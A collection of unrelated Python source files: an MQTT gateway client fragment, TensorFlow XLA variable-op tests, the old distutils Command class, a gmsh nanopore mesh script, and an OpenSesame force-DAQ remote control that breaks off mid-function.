self.__sub_dict = {}
def gw_set_server_side_rpc_request_handler(self, handler):
self.devices_server_side_rpc_request_handler = handler
def gw_send_rpc_reply(self, device, req_id, resp, quality_of_service):
if quality_of_service is None:
quality_of_service = self.quality_of_service
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(GATEWAY_RPC_TOPIC,
dumps({"device": device, "id": req_id, "data": resp}),
qos=quality_of_service)
return info
def gw_claim(self, device_name, secret_key, duration, claiming_request=None):
if claiming_request is None:
claiming_request = {
device_name: {
"secretKey": secret_key,
"durationMs": duration
}
}
info = self._client.publish(GATEWAY_CLAIMING_TOPIC, dumps(claiming_request), qos=self.quality_of_service)
return info
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for reading and writing variables."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training.gradient_descent import GradientDescentOptimizer
class VariableOpsTest(XLATestCase):
"""Test cases for resource variable operators."""
def testOneWriteOneOutput(self):
# Regression test for a bug where computations with one non-constant
# output and one variable update were mishandled.
for dtype in self.numeric_types:
init = np.array([[1, 2], [3, 4]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
p = array_ops.placeholder(dtype)
x = v.assign_add(p)
with ops.control_dependencies([x]):
y = v.read_value()
self.assertAllClose(np.array([[2, 3], [4, 5]], dtype=dtype),
sess.run(y, {p: 1}))
def testSparseRead0DIndices(self):
for dtype in self.numeric_types:
init = np.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read(2)
self.assertAllClose(np.array([8, 9, 10, 11], dtype=dtype), sess.run(x))
def testSparseRead1DIndices(self):
for dtype in self.numeric_types:
init = np.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read([2, 1])
self.assertAllClose(
np.array([[8, 9, 10, 11], [4, 5, 6, 7]], dtype=dtype), sess.run(x))
def testSparseRead2DIndices(self):
for dtype in self.numeric_types:
init = np.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]], dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read([[2, 1], [0, 2]])
self.assertAllClose(
np.array(
[[[8, 9, 10, 11], [4, 5, 6, 7]], [[0, 1, 2, 3], [8, 9, 10,
11]]],
dtype=dtype), sess.run(x))
def testSparseRead2DIndices3DTensor(self):
for dtype in self.numeric_types:
init = np.array(
[[[0, 1, 2], [3, 4, 5]], [[10, 11, 12], [13, 14, 15]],
[[20, 21, 22], [23, 24, 25]], [[30, 31, 32], [33, 34, 35]]],
dtype=dtype)
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable(init)
sess.run(variables.variables_initializer([v]))
x = v.sparse_read([[2, 1], [3, 0]])
self.assertAllClose(
np.array(
[[[[20, 21, 22], [23, 24, 25]], [[10, 11, 12], [13, 14, 15]]],
[[[30, 31, 32], [33, 34, 35]], [[0, 1, 2], [3, 4, 5]]]],
dtype=dtype), sess.run(x))
def testReadWrite(self):
"""Tests initialization, reading, and writing a resource variable."""
with self.test_session() as session:
with self.test_scope():
with variable_scope.variable_scope("ascope", use_resource=True):
x = variable_scope.get_variable(
"x",
shape=[],
dtype=dtypes.float32,
initializer=init_ops.constant_initializer(2))
a = x.read_value()
with ops.control_dependencies([a]):
b = state_ops.assign(x, 47)
with ops.control_dependencies([b]):
c = x.read_value()
with ops.control_dependencies([c]):
d = state_ops.assign_add(x, 3)
with ops.control_dependencies([d]):
e = x.read_value()
session.run(variables.global_variables_initializer())
v1, v2, v3 = session.run([a, c, e])
self.assertAllClose(2.0, v1)
self.assertAllClose(47.0, v2)
self.assertAllClose(50.0, v3)
def testTraining(self):
"""Tests a gradient descent step for a simple model."""
with self.test_session() as session:
with self.test_scope():
with variable_scope.variable_scope("ascope", use_resource=True):
w = variable_scope.get_variable(
"w",
shape=[4, 2],
dtype=dtypes.float32,
initializer=init_ops.constant_initializer(
np.array([[1, 2], [3, 4], [5, 6], [7, 8]], dtype=np.float32)))
b = variable_scope.get_variable(
"b",
shape=[2],
dtype=dtypes.float32,
initializer=init_ops.constant_initializer(
np.array([2, 3], dtype=np.float32)))
x = array_ops.placeholder(dtypes.float32, shape=[1, 4])
y = math_ops.matmul(x, w) + b
loss = math_ops.reduce_sum(y)
optimizer = GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
session.run(variables.global_variables_initializer())
session.run(train, {x: np.array([[7, 3, 5, 9]], dtype=np.float32)})
vw, vb = session.run([w, b])
self.assertAllClose(
np.array(
[[0.3, 1.3], [2.7, 3.7], [4.5, 5.5], [6.1, 7.1]],
dtype=np.float32),
vw,
rtol=1e-4)
self.assertAllClose(np.array([1.9, 2.9], dtype=np.float32), vb, rtol=1e-4)
class StridedSliceAssignChecker(object):
"""Compares the results of a slice assignment using Tensorflow and numpy."""
def __init__(self, test, x, dtype):
self.dtype = dtype
self.test = test
self.x_np = np.array(x).astype(dtype)
def __setitem__(self, index, value):
value = np.array(value).astype(self.dtype)
with self.test.test_session() as sess, self.test.test_scope():
x = constant_op.constant(self.x_np, dtype=self.dtype)
var = resource_variable_ops.ResourceVariable(x)
sess.run(variables.variables_initializer([var]))
val = sess.run(var[index].assign(value))
# val_copy is used to check that tf.assign works equivalently to the
# assign method above.
val_copy = sess.run(state_ops.assign(var[index], value))
valnp = np.copy(self.x_np)
valnp[index] = np.array(value)
self.test.assertAllEqual(val, valnp)
self.test.assertAllEqual(val_copy, valnp)
class SliceAssignTest(XLATestCase):
def testSliceAssign(self):
for dtype in self.numeric_types:
checker = StridedSliceAssignChecker(self, [[1, 2, 3], [4, 5, 6]],
dtype=dtype)
# No-op assignment
checker[:] = [[10, 20, 30], [40, 50, 60]]
# Checks trivial (1,1) shape tensor
checker[1:2, 1:2] = [[66]]
# shrink shape changes
checker[1:2, 1] = [66]
checker[1, 1:2] = [66]
checker[1, 1] = 66
# newaxis shape changes
checker[:, None, :] = [[[10, 20, 30]], [[40, 50, 50]]]
# shrink and newaxis
checker[None, None, 0, 0:1] = [[[99]]]
# Non unit strides
checker[::1, 1::-1] = [[3, 33], [4, 44]]
# degenerate interval
checker[8:10, 0] = []
checker[8:10, 8:10] = [[]]
# Assign vector to scalar (rank-0) using newaxis
checker2 = StridedSliceAssignChecker(self, 222, dtype=dtype)
checker2[()] = 6 # no indices
checker2[...] = 6 # ellipsis
checker2[None] = [6] # new axis
def testUninitialized(self):
with self.assertRaisesRegexp(errors.InvalidArgumentError,
"uninitialized variable"):
with self.test_session() as sess, self.test_scope():
v = resource_variable_ops.ResourceVariable([1, 2])
sess.run(v[:].assign([1, 2]))
if __name__ == "__main__":
googletest.main()
|
|
"""distutils.cmd
Provides the Command class, the base class for the command classes
in the distutils.command package.
"""
# created 2000/04/03, Greg Ward
# (extricated from core.py; actually dates back to the beginning)
__revision__ = "$Id: cmd.py,v 1.27 2001/03/22 03:48:31 akuchling Exp $"
import sys, os, string, re
from types import *
from distutils.errors import *
from distutils import util, dir_util, file_util, archive_util, dep_util
class Command:
"""Abstract base class for defining command classes, the "worker bees"
of the Distutils. A useful analogy for command classes is to think of
them as subroutines with local variables called "options". The options
are "declared" in 'initialize_options()' and "defined" (given their
final values, aka "finalized") in 'finalize_options()', both of which
must be defined by every command class. The distinction between the
two is necessary because option values might come from the outside
world (command line, config file, ...), and any options dependent on
other options must be computed *after* these outside influences have
been processed -- hence 'finalize_options()'. The "body" of the
subroutine, where it does all its work based on the values of its
options, is the 'run()' method, which must also be implemented by every
command class.
"""
# 'sub_commands' formalizes the notion of a "family" of commands,
# eg. "install" as the parent with sub-commands "install_lib",
# "install_headers", etc. The parent of a family of commands
# defines 'sub_commands' as a class attribute; it's a list of
# (command_name : string, predicate : unbound_method | string | None)
# tuples, where 'predicate' is a method of the parent command that
# determines whether the corresponding command is applicable in the
# current situation. (Eg. we "install_headers" is only applicable if
# we have any C header files to install.) If 'predicate' is None,
# that command is always applicable.
#
# 'sub_commands' is usually defined at the *end* of a class, because
# predicates can be unbound methods, so they must already have been
# defined. The canonical example is the "install" command.
sub_commands = []
# -- Creation/initialization methods -------------------------------
def __init__ (self, dist):
"""Create and initialize a new Command object. Most importantly,
invokes the 'initialize_options()' method, which is the real
initializer and depends on the actual command being
instantiated.
"""
# late import because of mutual dependence between these classes
from distutils.dist import Distribution
if not isinstance(dist, Distribution):
raise TypeError, "dist must be a Distribution instance"
if self.__class__ is Command:
raise RuntimeError, "Command is an abstract class"
self.distribution = dist
self.initialize_options()
# Per-command versions of the global flags, so that the user can
# customize Distutils' behaviour command-by-command and let some
# commands fallback on the Distribution's behaviour. None means
# "not defined, check self.distribution's copy", while 0 or 1 mean
# false and true (duh). Note that this means figuring out the real
# value of each flag is a touch complicated -- hence "self.verbose"
# (etc.) will be handled by __getattr__, below.
self._verbose = None
self._dry_run = None
# Some commands define a 'self.force' option to ignore file
# timestamps, but methods defined *here* assume that
# 'self.force' exists for all commands. So define it here
# just to be safe.
self.force = None
# The 'help' flag is just used for command-line parsing, so
# none of that complicated bureaucracy is needed.
self.help = 0
# 'finalized' records whether or not 'finalize_options()' has been
# called. 'finalize_options()' itself should not pay attention to
# this flag: it is the business of 'ensure_finalized()', which
# always calls 'finalize_options()', to respect/update it.
self.finalized = 0
# __init__ ()
def __getattr__ (self, attr):
if attr in ('verbose', 'dry_run'):
myval = getattr(self, "_" + attr)
if myval is None:
return getattr(self.distribution, attr)
else:
return myval
else:
raise AttributeError, attr
def ensure_finalized (self):
if not self.finalized:
self.finalize_options()
self.finalized = 1
# Subclasses must define:
# initialize_options()
# provide default values for all options; may be customized by
# setup script, by options from config file(s), or by command-line
# options
# finalize_options()
# decide on the final values for all options; this is called
# after all possible intervention from the outside world
# (command-line, option file, etc.) has been processed
# run()
# run the command: do whatever it is we're here to do,
# controlled by the command's various option values
def initialize_options (self):
"""Set default values for all the options that this command
supports. Note that these defaults may be overridden by other
commands, by the setup script, by config files, or by the
command-line. Thus, this is not the place to code dependencies
between options; generally, 'initialize_options()' implementations
are just a bunch of "self.foo = None" assignments.
This method must be implemented by all command classes.
"""
raise RuntimeError, \
"abstract method -- subclass %s must override" % self.__class__
def finalize_options (self):
"""Set final values for all the options that this command supports.
This is always called as late as possible, ie. after any option
assignments from the command-line or from other commands have been
done. Thus, this is the place to to code option dependencies: if
'foo' depends on 'bar', then it is safe to set 'foo' from 'bar' as
long as 'foo' still has the same value it was assigned in
'initialize_options()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, \
"abstract method -- subclass %s must override" % self.__class__
def dump_options (self, header=None, indent=""):
from distutils.fancy_getopt import longopt_xlate
if header is None:
header = "command options for '%s':" % self.get_command_name()
print indent + header
indent = indent + " "
for (option, _, _) in self.user_options:
option = string.translate(option, longopt_xlate)
if option[-1] == "=":
option = option[:-1]
value = getattr(self, option)
print indent + "%s = %s" % (option, value)
def run (self):
"""A command's raison d'etre: carry out the action it exists to
perform, controlled by the options initialized in
'initialize_options()', customized by other commands, the setup
script, the command-line, and config files, and finalized in
'finalize_options()'. All terminal output and filesystem
interaction should be done by 'run()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, \
"abstract method -- subclass %s must override" % self.__class__
def announce (self, msg, level=1):
"""If the current verbosity level is of greater than or equal to
'level' print 'msg' to stdout.
"""
if self.verbose >= level:
print msg
def debug_print (self, msg):
"""Print 'msg' to stdout if the global DEBUG (taken from the
DISTUTILS_DEBUG environment variable) flag is true.
"""
from distutils.core import DEBUG
if DEBUG:
print msg
# -- Option validation methods -------------------------------------
# (these are very handy in writing the 'finalize_options()' method)
#
# NB. the general philosophy here is to ensure that a particular option
# value meets certain type and value constraints. If not, we try to
# force it into conformance (eg. if we expect a list but have a string,
# split the string on comma and/or whitespace). If we can't force the
# option into conformance, raise DistutilsOptionError. Thus, command
# classes need do nothing more than (eg.)
# self.ensure_string_list('foo')
# and they can be guaranteed that thereafter, self.foo will be
# a list of strings.
def _ensure_stringlike (self, option, what, default=None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
elif type(val) is not StringType:
raise DistutilsOptionError, \
"'%s' must be a %s (got `%s`)" % (option, what, val)
return val
def ensure_string (self, option, default=None):
"""Ensure that 'option' is a string; if not defined, set it to
'default'.
"""
self._ensure_stringlike(option, "string", default)
def ensure_string_list (self, option):
"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
elif type(val) is StringType:
setattr(self, option, re.split(r',\s*|\s+', val))
else:
if type(val) is ListType:
types = map(type, val)
ok = (types == [StringType] * len(val))
else:
ok = 0
if not ok:
raise DistutilsOptionError, \
"'%s' must be a list of strings (got %s)" % \
(option, `val`)
def _ensure_tested_string (self, option, tester,
what, error_fmt, default=None):
val = self._ensure_stringlike(option, what, default)
if val is not None and not tester(val):
raise DistutilsOptionError, \
("error in '%s' option: " + error_fmt) % (option, val)
def ensure_filename (self, option):
"""Ensure that 'option' is the name of an existing file."""
self._ensure_tested_string(option, os.path.isfile,
"filename",
"'%s' does not exist or is not a file")
def ensure_dirname (self, option):
self._ensure_tested_string(option, os.path.isdir,
"directory name",
"'%s' does not exist or is not a directory")
# -- Convenience methods for commands ------------------------------
def get_command_name (self):
if hasattr(self, 'command_name'):
return self.command_name
else:
return self.__class__.__name__
def set_undefined_options (self, src_cmd, *option_pairs):
"""Set the values of any "undefined" options from corresponding
option values in some other command object. "Undefined" here means
"is None", which is the convention used to indicate that an option
has not been changed between 'initialize_options()' and
'finalize_options()'. Usually called from 'finalize_options()' for
options that depend on some other command rather than another
option of the same command. 'src_cmd' is the other command from
which option values will be taken (a command object will be created
for it if necessary); the remaining arguments are
'(src_option,dst_option)' tuples which mean "take the value of
'src_option' in the 'src_cmd' command object, and copy it to
'dst_option' in the current command object".
"""
# Option_pairs: list of (src_option, dst_option) tuples
src_cmd_obj = self.distribution.get_command_obj(src_cmd)
src_cmd_obj.ensure_finalized()
for (src_option, dst_option) in option_pairs:
if getattr(self, dst_option) is None:
setattr(self, dst_option,
getattr(src_cmd_obj, src_option))
def get_finalized_command (self, command, create=1):
"""Wrapper around Distribution's 'get_command_obj()' method: find
(create if necessary and 'create' is true) the command object for
'command', call its 'ensure_finalized()' method, and return the
finalized command object.
"""
cmd_obj = self.distribution.get_command_obj(command, create)
cmd_obj.ensure_finalized()
return cmd_obj
# XXX rename to 'get_reinitialized_command()'? (should do the
# same in dist.py, if so)
def reinitialize_command (self, command, reinit_subcommands=0):
return self.distribution.reinitialize_command(
command, reinit_subcommands)
def run_command (self, command):
"""Run some other command: uses the 'run_command()' method of
Distribution, which creates and finalizes the command object if
necessary and then invokes its 'run()' method.
"""
self.distribution.run_command(command)
def get_sub_commands (self):
"""Determine the sub-commands that are relevant in the current
distribution (ie., that need to be run). This is based on the
'sub_commands' class attribute: each tuple in that list may include
a method that we call to determine if the subcommand needs to be
run for the current distribution. Return a list of command names.
"""
commands = []
for (cmd_name, method) in self.sub_commands:
if method is None or method(self):
commands.append(cmd_name)
return commands
# -- External world manipulation -----------------------------------
def warn (self, msg):
sys.stderr.write("warning: %s: %s\n" %
(self.get_command_name(), msg))
def execute (self, func, args, msg=None, level=1):
util.execute(func, args, msg, self.verbose >= level, self.dry_run)
def mkpath (self, name, mode=0777):
dir_util.mkpath(name, mode,
self.verbose, self.dry_run)
def copy_file (self, infile, outfile,
preserve_mode=1, preserve_times=1, link=None, level=1):
"""Copy a file respecting verbose, dry-run and force flags. (The
former two default to whatever is in the Distribution object, and
the latter defaults to false for commands that don't define it.)"""
return file_util.copy_file(
infile, outfile,
preserve_mode, preserve_times,
not self.force,
link,
self.verbose >= level,
self.dry_run)
def copy_tree (self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0,
level=1):
"""Copy an entire directory tree respecting verbose, dry-run,
and force flags.
"""
return dir_util.copy_tree(
infile, outfile,
preserve_mode,preserve_times,preserve_symlinks,
not self.force,
self.verbose >= level,
self.dry_run)
def move_file (self, src, dst, level=1):
"""Move a file respecting verbose and dry-run flags."""
return file_util.move_file(src, dst,
self.verbose >= level,
self.dry_run)
def spawn (self, cmd, search_path=1, level=1):
"""Spawn an external command respecting verbose and dry-run flags."""
from distutils.spawn import spawn
spawn(cmd, search_path,
self.verbose >= level,
self.dry_run)
def make_archive (self, base_name, format,
root_dir=None, base_dir=None):
return archive_util.make_archive(
base_name, format, root_dir, base_dir,
self.verbose, self.dry_run)
def make_file (self, infiles, outfile, func, args,
exec_msg=None, skip_msg=None, level=1):
"""Special case of 'execute()' for operations that process one or
more input files and generate one output file. Works just like
'execute()', except the operation is skipped and a different
message printed if 'outfile' already exists and is newer than all
files listed in 'infiles'. If the command defined 'self.force',
and it is true, then the command is unconditionally run -- does no
timestamp checks.
"""
if exec_msg is None:
exec_msg = "generating %s from %s" % \
(outfile, string.join(infiles, ', '))
if skip_msg is None:
skip_msg = "skipping %s (inputs unchanged)" % outfile
# Allow 'infiles' to be a single string
if type(infiles) is StringType:
infiles = (infiles,)
elif type(infiles) not in (ListType, TupleType):
raise TypeError, \
"'infiles' must be a string, or a list or tuple of strings"
# If 'outfile' must be regenerated (either because it doesn't
# exist, is out-of-date, or the 'force' flag is true) then
# perform the action that presumably regenerates it
if self.force or dep_util.newer_group (infiles, outfile):
self.execute(func, args, exec_msg, level)
# Otherwise, print the "skip" message
else:
self.announce(skip_msg, level)
# make_file ()
# class Command
# XXX 'install_misc' class not currently used -- it was the base class for
# both 'install_scripts' and 'install_data', but they outgrew it. It might
# still be useful for 'install_headers', though, so I'm keeping it around
# for the time being.
class install_misc (Command):
"""Common base class for installing some files in a subdirectory.
Currently used by install_data and install_scripts.
"""
user_options = [('install-dir=', 'd', "directory to install the files to")]
def initialize_options (self):
self.install_dir = None
self.outfiles = []
def _install_dir_from (self, dirname):
self.set_undefined_options('install', (dirname, 'install_dir'))
def _copy_files (self, filelist):
self.outfiles = []
if not filelist:
return
self.mkpath(self.install_dir)
for f in filelist:
self.copy_file(f, self.install_dir)
self.outfiles.append(os.path.join(self.install_dir, f))
def get_outputs (self):
return self.outfiles
if __name__ == "__main__":
print "ok"
|
|
"""
python script that generates mesh for Wei et al geometry
"""
import numpy
import nanopores.py4gmsh.basic
import nanopores.py4gmsh.extra
from nanopores.py4gmsh import *
from params_geo import *
from warnings import warn
def get_geo(x0 = None, **params):
"""
writes a 3d geo file for an axissymmetric geometry for Wei et al
'Stochastic sensing ...'
_________
| |
| |
| _____|
| \____|
| |
| |
|________| *rotated around z-axis
"""
reload(nanopores.py4gmsh.basic)
reload(nanopores.py4gmsh.extra)
globals().update(params)
# define additional geo variables
# mesh generation should also work for no SAM layer
if lsam < tolc or lsam is None:
sam = None
else:
sam = True
l0 = lau +lsin +lsam
angle2 = angle/2.0
tan = numpy.tan(angle2*numpy.pi/180)
sin = numpy.sin(angle2*numpy.pi/180)
cos = numpy.cos(angle2*numpy.pi/180)
r1 = r0 + l0*tan
rsam = r0 + lsam/cos
rsin = r0 + lsam/cos + rlau
Rx = R
X_Fluid_up = numpy.array([
[0, 0, Rz],
[Rx, 0, Rz],
[Rx, 0, l0/2],
])
X_Fluid_low = numpy.array([
[Rx, 0, -l0/2],
[Rx, 0, -Rz],
[0, 0, -Rz],
])
X_Fluid_ctr = numpy.array([
[0, 0, -l0/2],
[0, 0, -l0/6],
[0, 0, +l0/6],
[0, 0, +l0/2],
])
X_SAM_ctr = numpy.array([
[r1, 0, l0/2],
[(2*r1+r0)/3, 0, l0/6],
[(r1+2*r0)/3, 0, -l0/6],
[r0, 0, -l0/2],
])
X_SiN = numpy.array([
[Rx, 0, -(l0/2-lsin)],
[rsin +tan*lsin, 0, -l0/2 +lsin],
[rsin, 0, -l0/2],
])
p_SAM = [Point(x, lcCenter) for x in X_SAM_ctr[:-1]]
p_SAM.append(Point(X_SAM_ctr[-1],lcCenter/5.0))
p_SiN = [Point(x, lcOuter) for x in X_SiN]
p_Fluid_up = [Point(x, lcOuter) for x in X_Fluid_up]
p_Fluid_low = [Point(x, lcOuter) for x in X_Fluid_low]
p_Fluid_ctr = [Point(x, lcCenter) for x in X_Fluid_ctr]
if sam is None:
p_Au = []
else:
X_Au = numpy.array([
[Rx, 0, -lsam +l0/2],
[rsam -tan*(lsam-l0), 0, -lsam + l0/2],
[rsam, 0, -l0/2],
])
p_Au = [Point(X_Au[0], lcOuter)]
p_Au.extend([Point(x, lcCenter) for x in X_Au[1:]])
# Group all fluid points into list
p_Fluid = p_Fluid_up + p_SAM
if sam is not None:
p_Fluid.append(p_Au[-1])
p_Fluid.append(p_SiN[-1])
p_Fluid.extend(p_Fluid_low)
geo_cs_str = "no crosssectional surface"
cs_pop_i = None
insert_ind = 0
Comment(' integrate crosssectional lines in fluid surface ')
z_CrossS = [X_Fluid_ctr[k][2] for k in reversed(range(len(X_Fluid_ctr)))]
e_CrossS = [Line(p_Fluid_ctr[k], p_SAM[len(p_SAM)-1-k]) for k in reversed(range(len(p_Fluid_ctr)))]
if x0 is not None and (x0[0]**2 + x0[1]**2 <= r1**2):
geo_cs_list = ["top", "center top", "center bottom", "bottom"]
# Determine position of molecule for correct geometry
for i in range(len(z_CrossS)):
if abs(x0[2] - z_CrossS[i]) < rMolecule:
cs_pop_i = i
if cs_pop_i is not None:
geo_cs_str = geo_cs_list[cs_pop_i]
e_CrossS.pop(cs_pop_i)
# Create Line Loops from the points sitting on the line
Comment(' Connect all outer Fluid points ')
e_Fluid = [Line(p_Fluid[k], p_Fluid[k+1]) for k in range(len(p_Fluid)-1)]
Comment(' Connect outer Membrane points ')
if sam is not None:
p_list_mem = [p_Fluid_low[0], p_SiN[0], p_Au[0], p_Fluid_up[-1]]
else:
p_list_mem = [p_Fluid_low[0], p_SiN[0], p_Fluid_up[-1]]
e_Membrane_ext = [Line(p_list_mem[k], p_list_mem[k+1]) \
for k in range(len(p_list_mem)-1)]
e_Membrane_in = []
Comment(' Integrate Membrane material interfaces into membrane')
if sam is not None:
e_Au = [Line(p_Au[k], p_Au[k+1]) for k in range(len(p_Au)-1)]
e_Membrane_in.extend(e_Au)
e_SiN = [Line(p_SiN[k], p_SiN[k+1]) for k in range(len(p_SiN)-1)]
e_Membrane_in.extend(e_SiN)
edges_to_rot = [e_Fluid, e_Membrane_ext, e_Membrane_in, e_CrossS]
rot_axis = [0.0, 0.0, 1.0]
point_on_rot_axis = [0.0, 0.0, 0.0]
surfs = []
n_rot = 4
rot_angle = '2*Pi/%f' %n_rot
n_e = len(edges_to_rot)
n_e_i = [len(edges_to_rot[i]) for i in range(n_e)]
for i in range(n_e):
surfs_i = []
Comment('Extrude in 4 steps by rot_angle %s around z-axis.' %rot_angle)
previous = edges_to_rot[i]
for j in range(n_rot):
Comment('Step %s' % (j+1))
for k in range(len(previous)):
name = Extrude('Line{%s}' % previous[k],
rotation_axis=rot_axis,
point_on_axis=point_on_rot_axis,
angle=rot_angle
)
surfs_i.append(name + '[1]')
previous[k] = name + '[0]'
surfs.append(surfs_i)
surfs_Fluid = surfs[0][:]
sl_Fluid = SurfaceLoop(surfs_Fluid)
if x0 is None:
vol_Fluid = Volume(sl_Fluid)
else:
Comment('Add molecule ball')
Molecule = add_ball(numpy.asarray(x0), rMolecule, lcMolecule,
with_volume=True, holes=None, label=None
)
sl_Fluid_Molecule = Array([sl_Fluid] + [Molecule[1]])
vol_Fluid = Volume(sl_Fluid_Molecule)
# Molecule[0]->Volume, Molecule[1]->surface loop, Molecule[2]->surfs
vol_Molecule = Molecule[0]
Comment(' Integrate crosssections into fluid')
surfs_CrossS = surfs[-1]
raw_code(['Surface{%s} In Volume{%s};' %(surfs_CrossS[k], vol_Fluid) \
for k in range(len(surfs_CrossS))])
Comment(' Add membrane')
surfs_Membrane = surfs[1][:]
n_Membrane_Fluid = len(p_Fluid_up+p_SAM)-1
for k in range(n_Membrane_Fluid):
surfs_Membrane.extend(surfs[0][len(p_Fluid_up)+k-1::n_e_i[0]])
sl_Membrane = SurfaceLoop(surfs_Membrane)
vol_Membrane = Volume(sl_Membrane)
Comment(' Integrate membrane interfaces into membrane')
surfs_MembraneIn = surfs[-2]
raw_code(['Surface{%s} In Volume{%s};' %(surfs_MembraneIn[k], vol_Membrane) \
for k in range(len(surfs_MembraneIn))])
if moleculeblayer and x0 is not None:
moleculeblayer_list = Molecule[2]
else:
moleculeblayer_list = []
if membraneblayer:
n_bl_start = len(surfs[1])+1*n_rot
#numbers of surfaces with a boundary layer: 4, or if sam 5
num_faces = (4 if not sam else 5)
membraneblayer_list = surfs_Membrane[n_bl_start:n_bl_start+num_faces*n_rot]
else:
membraneblayer_list = []
blayer_list = moleculeblayer_list + membraneblayer_list
if blayer_list:
blayer = BoundaryLayer(
edges_list=None, faces_list=blayer_list,
hfar=lcOuter, hwall_n=lcCenter*0.1, hwall_t=lcCenter*0.5,
thickness=1, ratio=2)
field_list = [blayer,]
raw_code(['bfield = newf;'])
raw_code(['Field[bfield] = Min;'])
raw_code(['Field[bfield].FieldsList = {%s};' %(','.join(field_list))])
# Uncomment for mesh size field
raw_code(['Background Field = bfield;'])
# to disable question dialogs
raw_code(['General.ExpertMode = 1;'])
# 3D mesh algorithm (1=Delaunay, 4=Frontal, 5=Frontal Delaunay, 6=FrontalHex, 7=MMG3D, 9=R-tree), default = 1
#raw_code(['Mesh.Algorithm3D = 1'])
geo_dict = {"gmsh mesh generating sript": __name__,
"xMolecule": x0,
"Number of crosssections": len(e_CrossS),
"Total number of crossections": 4,
"molecule crosses": geo_cs_str,
"popped crossection index": cs_pop_i,
"cs_pop_i": cs_pop_i,
"Typical length scale": lc,
"geo_code": get_code(),
}
return geo_dict
# -----
if __name__ == '__main__':
print(get_geo())
print('\n - This is the sample code for the geo file')
|
|
# -*- coding: utf-8 -*-
"""
Openseame Object or the force DAQ remote control
(c) O. Lindemann
v0.9
"""
from . import remote_control as rc
from libopensesame.experiment import experiment
from libopensesame.exceptions import osexception
from openexp.canvas import canvas
from openexp.keyboard import keyboard
FORCE_SERVER_IP = "192.168.1.1"
WEAK, FINE, STRONG = [0, 1, 2]
class OpensesameDAQControl():
def __init__(self, opensesame_experiment):
""" OpenSesame clock and var"""
if isinstance(opensesame_experiment, experiment):
self._exp = opensesame_experiment
else:
raise osexception("opensesame_experiment needs to be an instance of " +\
"opensesame.experiment.experiment")
self.clock = ExpyClock(self._exp.clock)
self.subject_number = self._exp.var.get(u'subject_nr')
self.experiment_name = self._exp.var.get(u'experiment_file').split('.')[0]
self.udp = rc.init_udp_connection()
self._exp.cleanup_functions.append(self.quit_recording)
def __del__(self):
self.quit_recording()
def start(self, time_for_feedback=10):
""" returns true if feedback is OK
waits a particular time (in sec) for feedback and
"""
self.udp.send(rc.Command.START)
self.clock.reset_stopwatch()
kbd = keyboard(self._exp)
while True:
rtn = self.udp.poll()
kbd.get_key(timeout=0) # just for keyboard processing
if rtn == rc.Command.FEEDBACK_STARTED:
break
if self.clock.stopwatch_time > time_for_feedback*1000:
msg = "ERROR: Could not start recording <br/> Press key to quit"
cnv = canvas(self._exp)
cnv.text(msg)
cnv.show()
kbd.get_key()
self._exp.end()
exit()
return True
def stop(self):
self.udp.send(rc.Command.QUIT)
def quit_recording(self):
if self.udp is not None:
self.udp.send(rc.Command.QUIT)
self.udp = None
def pause(self, time_for_feedback=60 * 2, text_saving_time ="Please wait..."):
"""returns true if feedback is OK (that means data are saved)
waits for a particular for feedback
"""
self.udp.send(rc.Command.PAUSE)
self.clock.reset_stopwatch()
kbd = keyboard(self._exp)
if text_saving_time != None:
cnv = canvas(self._exp)
cnv.text(text_saving_time)
cnv.show()
while True:
rtn = self.udp.poll()
kbd.get_key(timeout=1)
if rtn == rc.Command.FEEDBACK_PAUSED:
break
if self.clock.stopwatch_time > time_for_feedback * 1000:
return False
if text_saving_time != None:
canvas(self._exp).show()
return True
# make connection #
def make_connection(self, ip=FORCE_SERVER_IP):
"""hand shake and filename,
returns forceDAQ version
"""
kbd = keyboard(self._exp)
cnv = canvas(self._exp)
cnv.text("Prepare force recording <br> press key if ready")
cnv.show()
kbd.get_key()
canvas(self._exp).show()
while not self.udp.connect_peer(ip):
cnv = canvas(self._exp)
cnv.text("ERROR while connecting to server <br> try again or Q to quit")
cnv.show()
key = kbd.get_key()
